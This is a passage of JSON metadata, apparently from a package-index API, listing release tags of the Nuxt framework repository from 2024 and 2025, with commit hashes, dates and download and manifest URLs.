eleases/tag/v3.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.0/manifests"},{"name":"v4.0.3","sha":"c09da8cfa0684bf70a3d657add7feb88ffd7807d","kind":"commit","published_at":"2025-08-05T08:26:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.3/manifests"},{"name":"v3.18.1","sha":"dfac5a97d2ec084e194c04f643221118fec9e4c6","kind":"commit","published_at":"2025-08-05T08:26:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.18.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.18.1/manifests"},{"name":"v4.0.2","sha":"5d3ef933c3ab2ee9aa3141b3fea7b1549ade7b3a","kind":"commit","published_at":"2025-07-28T23:50:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.2/manifests"},{"name":"v3.18.0","sha":"8d9ebfb2a10596211996778fb14b35a20024c319","kind":"commit","published_at":"2025-07-28T23:48:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.18.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.18.0/manifests"},{"name":"v4.0.1","sha":"3cfdac3c204c9d64240719f64935484b2b3318f2","kind":"commit","published_at":"2025-07-21T08:55:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"8aacdde48e8388c8bb11b9a5c2f59935341bfcfd","kind":"commit","published_at":"2025-07-15T22:15:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0/manifests"},{"name":"v3.17.7","sha":"b56bc134455391f3ea43d29140162f0b04b615b0","kind":"commit","published_at":"2025-07-13T19:25:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.7/manifests"},{"name":"v4.0.0-rc.0","sha":"0344123b3c2c46c6f591c42696eef8ffc6504947","kind":"commit","published_at":"2025-07-07T22:42:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-rc.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-rc.0/manifests"},{"name":"v3.17.6","sha":"9867529347c072efb8da5806f6a973cd853d72e1","kind":"commit","published_at":"2025-07-01T16:46:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.6/manifests"},{"name":"v4.0.0-alpha.4","sha":"14dd686b8b47beecf024318ae304919cd81ab4ad","kind":"commit","published_at":"2025-06-27T13:36:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"8b9e1a1ef774dab5a36a94268439079de1a887de","kind":"commit","published_at":"2025-06-26T16:17:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"4b56bb92b9242df959f091e1d2be72cd492f30ca","kind":"commit","published_at":"2025-06-12T09:16:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.2/manifests"},{"name":"v3.17.5","sha":"0fa7ff9908c8a573c1efedf216cdf5ec901820af","kind":"commit","published_at":"2025-06-03T21:38:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.5/manifests"},{"name":"v4.0.0-alpha.1","sha":"e379ac3e8dd3b37ca26a01d0dc0ffcbc46ece1aa","kind":"commit","published_at":"2025-06-02T19:45:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.1/manifests"},{"name":"v3.17.4","sha":"f7437ce28f83723492a1e540a9b43c56c469234a","kind":"commit","published_at":"2025-05-20T19:57:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.4/manifests"},{"name":"v3.17.3","sha":"c6dad342e6718377136c675c64d6e20c420dea81","kind":"commit","published_at":"2025-05-12T13:58:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.3/manifests"},{"name":"v3.17.2","sha":"346bb2bfe3324b353ec65d4b2f09b46e0a7c5c71","kind":"commit","published_at":"2025-05-05T08:54:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.2/manifests"},{"name":"v3.17.1","sha":"de02d2312d79f0bae4eb382a565253b7ddc98f86","kind":"commit","published_at":"2025-04-29T00:20:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.1/manifests"},{"name":"v3.17.0","sha":"fa4618c801a3549b56477b8e880f085f527baf84","kind":"commit","published_at":"2025-04-27T22:38:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.0/manifests"},{"name":"v3.16.2","sha":"be46b279d12b2ebca676a9db05244ae64c980f78","kind":"commit","published_at":"2025-04-01T10:36:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.16.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.2/manifests"},{"name":"v3.16.1","sha":"cd38de24c14e586b61f742e902ad1e3c2ebd2d31","kind":"commit","published_at":"2025-03-19T16:49:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.16.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.1/manifests"},{"name":"v3.16.0","sha":"7a37a982535f6da0cef16c4d7d3a81df42429ec1","kind":"commit","published_at":"2025-03-07T14:21:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.16.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.0/manifests"},{"name":"v3.15.4","sha":"244da170dd61e9aa790d5e9fdf988aa0a128d55a","kind":"commit","published_at":"2025-01-29T08:03:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.4/manifests"},{"name":"v3.15.3","sha":"048f974eba45e4909dcf53e8ce692fae3c5db37f","kind":"commit","published_at":"2025-01-24T23:38:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.3/manifests"},{"name":"v3.15.2","sha":"87a0ee59aec69c24a83993dcd329ecc9d25c3df3","kind":"commit","published_at":"2025-01-15T15:16:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.2/manifests"},{"name":"v3.15.1","sha":"fdf6e879ea00c9e313458e32dc911ca846a525d4","kind":"commit","published_at":"2025-01-05T12:04:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.1/manifests"},{"name":"v3.15.0","sha":"1acc9a0a3adabf250b979e58ed634874a9d90ddd","kind":"commit","published_at":"2024-12-24T23:47:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.0/manifests"},{"name":"v3.14.1592","sha":"3894e9d7c1fdeed11ea380cc84f7641d90f52a46","kind":"commit","published_at":"2024-11-19T20:52:02.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.14.1592","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.14.1592","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.14.1592","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.1592","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.1592/manifests"},{"name":"v3.14.159","sha":"625689077052ccbea0812defe34e13edb4ca0983","kind":"commit","published_at":"2024-11-06T11:34:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.14.159","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.14.159","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.14.159","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.159","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.159/manifests"},{"name":"v3.14.0","sha":"42420521c7eaf3480191f990e4fb545954f8f551","kind":"commit","published_at":"2024-11-04T15:46:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.14.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.0/manifests"},{"name":"v3.13.2","sha":"a50725300f31ca590f0dd4db16db97e3af9a0b18","kind":"commit","published_at":"2024-09-15T21:03:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.13.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.2/manifests"},{"name":"v3.13.1","sha":"9983e83dae92195e58812e2a106dc9660e0cb559","kind":"commit","published_at":"2024-09-04T09:39:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.13.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.1/manifests"},{"name":"v3.13.0","sha":"74ef96d096d0045fd00fccd880c1dbbfea51e22a","kind":"commit","published_at":"2024-08-22T16:03:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.13.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.0/manifests"},{"name":"v3.12.4","sha":"4a1349f700aa6af14253de7363acf243ecad2c02","kind":"commit","published_at":"2024-07-18T22:30:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.4/manifests"},{"name":"v3.12.3","sha":"a9fcd82d8eeaf750205838a4e96e9478f18a154f","kind":"commit","published_at":"2024-07-02T15:05:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.3/manifests"},{"name":"v2.18.1","sha":"81f5335f26b4f593004a503f2ec7d9a6fd723b64","kind":"tag","published_at":"2024-06-28T11:35:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.18.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.18.1/manifests"},{"name":"v2.18.0","sha":"9f5fc19018ae2d6c9afe2ece12d86cba7bbed8f8","kind":"tag","published_at":"2024-06-27T15:41:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.18.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.18.0/manifests"},{"name":"v3.12.2","sha":"8578e2bd62bdf3ce9dab70c7241a3953feb043b7","kind":"commit","published_at":"2024-06-16T07:36:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.2/manifests"},{"name":"v2.17.4","sha":"5b437353d0ae6972e7a35a47feb8062949daf625","kind":"tag","published_at":"2024-06-14T13:46:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.4/manifests"},{"name":"v3.12.1","sha":"41fc45da254408921972ab626101c41cea70de32","kind":"commit","published_at":"2024-06-11T10:50:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.1/manifests"},{"name":"v3.12.0","sha":"9f06842fa1b323bd0e0911b0335a091a9052b5c3","kind":"commit","published_at":"2024-06-11T08:44:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.0/manifests"},{"name":"@nuxt/ui-templates@1.3.3","sha":"a16107b93bad4fd5a25d48598967e11b59b7baf3","kind":"tag","published_at":"2024-04-05T12:43:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.3/manifests"},{"name":"v3.11.2","sha":"3c90aaf8e21955cf0644df2e0b09e3e33441e8e2","kind":"commit","published_at":"2024-04-04T16:04:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.2/manifests"},{"name":"@nuxt/ui-templates@1.3.2","sha":"61297118022700364431a76ee0d5fd3ac7b0b61c","kind":"tag","published_at":"2024-04-02T14:38:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.2/manifests"},{"name":"@nuxt/ui-assets@0.2.1","sha":"61297118022700364431a76ee0d5fd3ac7b0b61c","kind":"tag","published_at":"2024-04-02T14:38:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-assets@0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-assets@0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt